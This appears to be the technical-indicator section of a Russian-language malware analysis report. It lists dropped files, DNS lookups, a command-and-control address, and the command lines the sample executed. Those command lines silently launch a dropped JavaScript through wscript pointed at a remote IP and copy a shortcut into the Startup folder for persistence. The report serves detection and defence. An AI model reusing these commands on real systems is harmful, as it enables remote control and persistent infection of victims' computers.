Техническая информация
- %TEMP%\msedge.lnk
- %TEMP%\msedge.lnk
- %TEMP%\iwcqic.js
- http://84.##1.189.216/
- DNS ASK drive.google.com
- DNS ASK microsoft.com
- DNS ASK fo###.#oogleapis.com
- DNS ASK gs##tic.com
- DNS ASK fo###.gstatic.com
- DNS ASK ss#.#static.com
- ClassName: 'IEFrame' WindowName: ''
- ClassName: 'Static' WindowName: ''
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\iwcqic.js" 84.201.189.216/ 1
- '%WINDIR%\syswow64\wscript.exe' "%TEMP%\iwcqic.js" 84.201.189.216/ 2
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\iwcqic.js" 84.201.189.216/ 1 & start /b wscript "%TEMP%\iwcqic.js" 84.201.189.216/ 2 & move "%TEMP%\MSEdge.lnk" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Star...' (со скрытым окном)
- '%WINDIR%\syswow64\explorer.exe' "https://drive.google.com/file/d/1j9H9T5QSQYayAJLvQJcGf_FI_7QHQiq_/view"
- '%WINDIR%\syswow64\cmd.exe' /c start /b wscript "%TEMP%\iwcqic.js" 84.201.189.216/ 1 & start /b wscript "%TEMP%\iwcqic.js" 84.201.189.216/ 2 & move "%TEMP%\MSEdge.lnk" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Star...